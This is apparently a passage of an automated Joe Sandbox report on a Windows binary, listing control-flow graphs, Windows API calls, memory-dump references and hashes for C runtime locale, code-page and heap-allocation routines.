                                                                                                                                                                                                                            control_flow_graph 0 1ac9d4-1ac9ed 1 1ac9ef-1ac9ff call 1a3228 0->1 2 1aca03-1aca08 0->2 1->2 8 1aca01 1->8 4 1aca0a-1aca14 2->4 5 1aca17-1aca3d call 1acd7f 2->5 4->5 10 1aca43-1aca4e 5->10 11 1acbb0-1acbc1 call 199367 5->11 8->2 12 1acba3 10->12 13 1aca54-1aca59 10->13 17 1acba5 12->17 15 1aca5b-1aca64 call 1999f0 13->15 16 1aca6e-1aca79 call 1a7a23 13->16 25 1aca66-1aca6c 15->25 26 1aca84-1aca88 15->26 16->26 27 1aca7b 16->27 21 1acba7-1acbae call 1992af 17->21 21->11 29 1aca81 25->29 26->17 30 1aca8e-1acaa5 call 1acd7f 26->30 27->29 29->26 30->17 33 1acaab-1acabd call 1a762c 30->33 35 1acac2-1acac6 33->35 36 1acac8-1acad0 35->36 37 1acae1-1acae3 35->37 38 1acb0a-1acb16 36->38 39 1acad2-1acad7 36->39 37->17 42 1acb18-1acb1a 38->42 43 1acb95 38->43 40 1acb89-1acb8b 39->40 41 1acadd-1acadf 39->41 40->21 41->37 45 1acae8-1acb02 call 1a762c 41->45 46 1acb2f-1acb3a call 1a7a23 42->46 47 1acb1c-1acb25 call 1999f0 42->47 44 1acb97-1acb9e call 1992af 43->44 44->37 45->40 57 1acb08 45->57 46->44 56 1acb3c 46->56 47->44 58 1acb27-1acb2d 47->58 59 1acb42-1acb47 56->59 57->37 58->59 59->44 60 1acb49-1acb61 call 1a762c 59->60 60->44 63 1acb63-1acb6a 60->63 64 1acb6c-1acb6d 63->64 65 1acb8d-1acb93 63->65 66 1acb6e-1acb80 call 1acdfb 64->66 65->66 66->44 69 1acb82-1acb88 call 1992af 66->69 69->40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 001ACA5B
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 001ACB1C
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACB83
                                                                                                                                                                                                                              • Part of subcall function 001A7A23: HeapAlloc.KERNEL32(00000000,001ADBAE,?,?,001ADBAE,00000220,?,?,?), ref: 001A7A55
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACB98
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACBA8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                                                                                            • Opcode ID: f4e55c0187827c286ba41230a5c9b11633073d9e27f70300481628ce028c2b37
                                                                                                                                                                                                                            • Instruction ID: 2049c90d2803805c55e85fcce215a1b82170af550cb42916a5e99d39d37e1ab0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4e55c0187827c286ba41230a5c9b11633073d9e27f70300481628ce028c2b37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE51B4B660021AAFEF259F68CC82EBB7AA9EF56790F150128FD04E7151E775CD1087E0
                                                                                                                                                                                                                            Function 001ADDAA Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 72 1addaa-1addd2 call 1ad8da 75 1adf9a-1adf9b call 1ad94b 72->75 76 1addd8-1addde 72->76 79 1adfa0-1adfa2 75->79 78 1adde1-1adde7 76->78 80 1adee9-1adf08 call 19aa90 78->80 81 1added-1addf9 78->81 83 1adfa3-1adfb1 call 199367 79->83 89 1adf0b-1adf10 80->89 81->78 84 1addfb-1ade01 81->84 87 1adee1-1adee4 84->87 88 1ade07-1ade13 IsValidCodePage 84->88 87->83 88->87 91 1ade19-1ade20 88->91 92 1adf4d-1adf57 89->92 93 1adf12-1adf17 89->93 94 1ade48-1ade55 GetCPInfo 91->94 95 1ade22-1ade2e 91->95 92->89 100 1adf59-1adf83 call 1ad89c 92->100 98 1adf4a 93->98 99 1adf19-1adf21 93->99 96 1ade57-1ade76 call 19aa90 94->96 97 1aded5-1adedb 94->97 101 1ade32-1ade3e call 1ad9ae 95->101 96->101 112 1ade78-1ade7f 96->112 97->75 97->87 98->92 105 1adf42-1adf48 99->105 106 1adf23-1adf26 99->106 111 1adf84-1adf93 100->111 108 1ade43 101->108 105->93 105->98 110 1adf28-1adf2e 106->110 108->79 110->105 113 1adf30-1adf40 110->113 111->111 114 1adf95 111->114 115 1adeab-1adeae 112->115 116 1ade81-1ade86 112->116 113->105 113->110 114->75 118 1adeb3-1adeba 115->118 116->115 117 1ade88-1ade90 116->117 119 1ade92-1ade99 117->119 120 1adea3-1adea9 117->120 118->118 121 1adebc-1aded0 call 1ad89c 118->121 122 1ade9a-1adea1 119->122 120->115 120->116 121->101 122->120 122->122
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001AD8DA: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 001AD905
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,001ADBF1,?,00000000,?,?,?), ref: 001ADE0B
                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,001ADBF1,?,00000000,?,?,?), ref: 001ADE4D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 546120528-0
                                                                                                                                                                                                                            • Opcode ID: 690b15d4790ff3cf1c8cebcd2e962b42309502a43f4d13d97d9e0cade4c69278
                                                                                                                                                                                                                            • Instruction ID: 9943698eee7d04d1cff1c7d7fcc7c4dc865308aa9af6c524a68eda4e9562c01c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 690b15d4790ff3cf1c8cebcd2e962b42309502a43f4d13d97d9e0cade4c69278
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D510378A00B459EDB21DF75D881AABBBF4EFA3300F18406ED0838B952E7749946CB51
                                                                                                                                                                                                                            Function 001A762C Relevance: 3.0, APIs: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 125 1a762c-1a763b call 1a71bb 128 1a763d-1a7662 LCMapStringEx 125->128 129 1a7664-1a767e call 1a7689 LCMapStringW 125->129 133 1a7684-1a7686 128->133 129->133
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LCMapStringEx.KERNELBASE(?,001ACAC2,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 001A7660
                                                                                                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,001ACAC2,?,?,00000000,?,00000000), ref: 001A767E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: String
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2568140703-0
                                                                                                                                                                                                                            • Opcode ID: 903cb0b91cc357ccb675f83ba3569af4816eb20a78ac65455e198ef140d7854e
                                                                                                                                                                                                                            • Instruction ID: cb2c6b1f80711d6360aa502f7854ba697b8b832230683e33548021a96dbbfe75
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 903cb0b91cc357ccb675f83ba3569af4816eb20a78ac65455e198ef140d7854e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF09D3640461ABBCF136F94DC05EDE3F66EF59360F058110FA1965160C736CA72EB94
                                                                                                                                                                                                                            Function 001AD9AE Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 134 1ad9ae-1ad9d0 135 1adae9-1adb0f 134->135 136 1ad9d6-1ad9e8 GetCPInfo 134->136 138 1adb14-1adb19 135->138 136->135 137 1ad9ee-1ad9f5 136->137 139 1ad9f7-1ada01 137->139 140 1adb1b-1adb21 138->140 141 1adb23-1adb29 138->141 139->139 144 1ada03-1ada16 139->144 145 1adb31-1adb33 140->145 142 1adb2b-1adb2e 141->142 143 1adb35 141->143 142->145 146 1adb37-1adb49 143->146 147 1ada37-1ada39 144->147 145->146 146->138 148 1adb4b-1adb59 call 199367 146->148 149 1ada3b-1ada72 call 1ac8cb call 1acbc2 147->149 150 1ada18-1ada1f 147->150 160 1ada77-1adaac call 1acbc2 149->160 152 1ada2e-1ada30 150->152 156 1ada32-1ada35 152->156 157 1ada21-1ada23 152->157 156->147 157->156 159 1ada25-1ada2d 157->159 159->152 163 1adaae-1adab8 160->163 164 1adaba-1adac4 163->164 165 1adac6-1adac8 163->165 166 1adad8-1adae5 164->166 167 1adaca-1adad4 165->167 168 1adad6 165->168 166->163 169 1adae7 166->169 167->166 168->166 169->148
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(E8458D00,?,001ADBFD,001ADBF1,00000000), ref: 001AD9E0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Info
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1807457897-0
                                                                                                                                                                                                                            • Opcode ID: 79ba510c40d5f8e61978bd37f7ddd8b557acc129ddb15294600a2b978cb28abb
                                                                                                                                                                                                                            • Instruction ID: b0c3bd8f0a38e45c8a84fd6a0899424f7d7a6245d98840e977b436663002b4b2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79ba510c40d5f8e61978bd37f7ddd8b557acc129ddb15294600a2b978cb28abb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C95147796082589BDB218E28DC84AF67BBCEB57304F2405EDE49BD7542C3359D46DF20
                                                                                                                                                                                                                            Function 001957E2 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 186 1957e2-1957e7 187 1957ed-1957f4 KiUserExceptionDispatcher 186->187 188 19724e-19726a call 19717f call 19ad9b 186->188 187->188
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 001957EF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                                                                            • Opcode ID: 5d49dd715d28d35f00510ffd9ebf20c5426e9708e427dec8b8491ef575423dfb
                                                                                                                                                                                                                            • Instruction ID: 58f842b61675ad0224d3633d0452eb6b74b9dfb9fab8d8c9cbab85becabb0c93
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d49dd715d28d35f00510ffd9ebf20c5426e9708e427dec8b8491ef575423dfb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1D0A774A00208ABCF04FBB5C849D9EB3FCAF14701B5040BCB4158B496DB30E90DC681

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 001B10A3 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                            • Opcode ID: 8d4abb8ee8e11d938c68e2c1378d9f96b15617fa2b94c0425f628a15a20557ba
                                                                                                                                                                                                                            • Instruction ID: d126a8030aa26cad08d5ad009e37b70d87bb8555efac6be459751ef2a2bd445c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d4abb8ee8e11d938c68e2c1378d9f96b15617fa2b94c0425f628a15a20557ba
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CD24971E082299FDB65CE28DD507EAB7B5FB49304F5541EAD80DE7240EB38AE858F40
                                                                                                                                                                                                                            Function 001B051E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,001B083C,00000002,00000000,?,?,?,001B083C,?,00000000), ref: 001B05B7
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,001B083C,00000002,00000000,?,?,?,001B083C,?,00000000), ref: 001B05E0
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,001B083C,?,00000000), ref: 001B05F5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                            • Opcode ID: 852f71fa3954b87abe3c0b9fc14055e5c46a5181198f5869401ded7f8faa0bf4
                                                                                                                                                                                                                            • Instruction ID: 82b011fef9ccf9ae3ed465798c016987a69ea2f0eea9d8ad56bbb1631a143b29
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 852f71fa3954b87abe3c0b9fc14055e5c46a5181198f5869401ded7f8faa0bf4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D21C572A04101EAEB36DF24CD01AD773A6AB6CB60B568564F94AD7900EB32DE81CB50
                                                                                                                                                                                                                            Function 001B06F3 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001B07FF
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 001B0848
                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 001B0857
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001B089F
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001B08BE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                                                            • Opcode ID: 43cb7857c5bbbb30606c06a37dd78bd1ccb2d4733561ece971edaeb8e5a5228b
                                                                                                                                                                                                                            • Instruction ID: ab91f24a37110ecd09f2e4ef0adee7bf4937ad7e66885c6e84785a2273ebd7f1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43cb7857c5bbbb30606c06a37dd78bd1ccb2d4733561ece971edaeb8e5a5228b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD516171D00209ABDB22EFA5CC45AEFB7B8BF1C700F144569F551E7191EB70EA408B61
                                                                                                                                                                                                                            Function 001AFD8F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,001A4F88,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AFE50
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A4F88,?,?,?,00000055,?,-00000050,?,?), ref: 001AFE7B
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AFFDE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                            • API String ID: 607553120-905460609
                                                                                                                                                                                                                            • Opcode ID: 9a3584d315ad6f64df94caaf67ded1fd81df36e0f36d39fe87e574df88664115
                                                                                                                                                                                                                            • Instruction ID: 4a88e39a5522a0a29a3ad830c47c05d5250ecaa0f5e5d5bcc8595d01fa40cd65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a3584d315ad6f64df94caaf67ded1fd81df36e0f36d39fe87e574df88664115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7471047AA00206AADB25ABB4CC86BA6B3A8EF1B700F11403DF505D7191FB74ED428760
                                                                                                                                                                                                                            Function 001A7C32 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
